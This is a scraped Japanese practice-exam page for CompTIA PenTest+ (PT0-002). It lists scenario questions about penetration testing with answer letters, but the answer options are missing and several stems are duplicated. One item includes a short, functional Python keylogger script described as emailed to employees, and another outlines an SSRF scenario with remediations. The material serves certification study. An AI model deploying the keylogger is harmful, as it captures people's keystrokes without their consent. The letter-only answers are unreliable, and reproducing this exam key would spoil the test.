CompTIA PenTest+ Certification (PT0-002日本語版) - PT0-002日本語 Exam Practice Test
ワイヤレス セキュリティ評価の範囲に含める必要がある最も重要な項目は次のどれですか?
Correct Answer: A
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).
侵入テスターは、内部ネットワークの一部へのアクセスを取得し、別のネットワーク セグメントで悪用しようとしています。Scapy を使用して、テスターは次のコマンドを実行します。
次のうち、侵入テスターが達成しようとしていることを表しているのはどれですか?
次のうち、侵入テスターが達成しようとしていることを表しているのはどれですか?
Correct Answer: C
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).
侵入テスト チームは、会社のオフィスで電子記録のセキュリティをテストする必要があります。契約条件により、侵入テストは営業時間後に実施する必要があり、アラームの回避や破壊的な侵入の実行を含めるべきではありません。外部の偵察中に、チームは隣接する建物からドアが開いているのを確認します。エンゲージメントの条件の下で許可されるのは、次のうちどれですか?
Correct Answer: C
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).
最高情報セキュリティ責任者は、会社の電子商取引アプリケーションのセキュリティを評価したいと考えています。
アラームをトリガーせずにアプリケーションから関連情報を取得するために、侵入テスターが最初に使用する必要があるツールは次のうちどれですか?
アラームをトリガーせずにアプリケーションから関連情報を取得するために、侵入テスターが最初に使用する必要があるツールは次のうちどれですか?
Correct Answer: C
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).
ペネトレーションテスターが営業時間外にテストを実施していたところ、重要なシステムがダウンしていることに気づきました。次の連絡先のうち、最初に通知する必要があるのはどれですか?
Correct Answer: B
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).
ある企業は最近、ソフトウェア開発アーキテクチャを VM からコンテナに移行しました。同社はペネトレーションテスターに、新しいコンテナがDDoS攻撃に対して正しく構成されているかどうかを判断するよう依頼した。
テスターは次のうちどれを最初に実行する必要がありますか?
テスターは次のうちどれを最初に実行する必要がありますか?
Correct Answer: A
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).
評価中に、ペネトレーション テスターは次の Python スクリプトを CompTIA の従業員に電子メールで送信しました。
import pyHook, sys, logging, pythoncom, datetime
log_file='C:\\Windows\\Temp\\log_comptia.txt' def KbrdEvent(event):
logging.basicConfig(filename=log_file,level=logging.DEBUG, format='%(messages)s') chr(event.Ascii) logging.log(10, chr(event.Ascii)) return True hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = KbrdEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages()このスクリプトの意図された効果は次のうちどれですか?
import pyHook, sys, logging, pythoncom, datetime
log_file='C:\\Windows\\Temp\\log_comptia.txt' def KbrdEvent(event):
logging.basicConfig(filename=log_file,level=logging.DEBUG, format='%(messages)s') chr(event.Ascii) logging.log(10, chr(event.Ascii)) return True hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = KbrdEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages()このスクリプトの意図された効果は次のうちどれですか?
Correct Answer: A
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).
ある企業が、企業の SSO ポータルを模倣したサイトへのリンクを含む電子メールを従業員に送信することで、シミュレートされたフィッシング攻撃を実行しました。電子メールを受け取った従業員の 80% がリンクをクリックし、偽のサイトで会社の資格情報を提供しました。次の推奨事項のうち、この状況に最もよく対処するのはどれですか?
Correct Answer: D
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).
従業員は、銀行口座が無効化され、24 時間以内に応答しないと期限切れになるという内容のメールを受け取りました。次の攻撃のうち、このシナリオに最も当てはまるものはどれですか。
Correct Answer: A
Vote an answer
次のスクリプトがあるとします。
True の場合:
印刷 (「Hello World」)
次のうち、True を表すものはどれですか?
True の場合:
印刷 (「Hello World」)
次のうち、True を表すものはどれですか?
Correct Answer: B
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).
シミュレーション
侵入テスターは、クライアントの Web アプリケーションに対して複数の Nmap スキャンを実行します。
説明書
WAFとサーバーをクリックしてNmapスキャンの結果を確認します。次に、
各タブをクリックして、適切な脆弱性と修復オプションを選択します。
いつでもシミュレーションの初期状態に戻したい場合は、
[すべてリセット]ボタンをクリックします。
侵入テスターは、クライアントの Web アプリケーションに対して複数の Nmap スキャンを実行します。
説明書
WAFとサーバーをクリックしてNmapスキャンの結果を確認します。次に、
各タブをクリックして、適切な脆弱性と修復オプションを選択します。
いつでもシミュレーションの初期状態に戻したい場合は、
[すべてリセット]ボタンをクリックします。
Correct Answer:
Most likely vulnerability: Perform a SSRF attack against App01.example.com from CDN.example.com.
The scenario suggests that the CDN network (with a WAF) can be used to perform a Server-Side Request Forgery (SSRF) attack. Since the penetration tester has the pentester workstation interacting through the CDN/WAF and the production network is behind it, the most plausible attack vector is to exploit SSRF to interact with the internal services like App01.example.com.
Two best remediation options:
Restrict direct communications to App01.example.com to only approved components.
Require an additional authentication header value between CDN.example.com and App01.example.com.
Restrict direct communications to App01.example.com to only approved components: This limits the exposure of the application server by ensuring that only specified, trusted entities can communicate with it.
Require an additional authentication header value between CDN.example.com and App01.example.com: Adding an authentication layer between the CDN and the app server helps ensure that requests are legitimate and originate from trusted sources, mitigating SSRF and other indirect attack vectors.
Nmap Scan Observations:
CDN/WAF shows open ports for HTTP and HTTPS but filtered for MySQL, indicating it acts as a filtering layer.
App Server has open ports for HTTP, HTTPS, and filtered for MySQL.
DB Server has all ports filtered, typical for a database server that should not be directly accessible.
These findings align with the SSRF vulnerability and the appropriate remediation steps to enhance the security of internal communications.
積極的な偵察の一環として、侵入テスト担当者は、Web アプリケーション攻撃からターゲットの Web サイトを保護するための保護メカニズムが導入されているかどうかを判断する必要があります。次の方法のうち、最も適切なものはどれでしょうか。
Correct Answer: D
Vote an answer
Explanation: Only visible for Fast2test members. You can sign-up / login (it's free).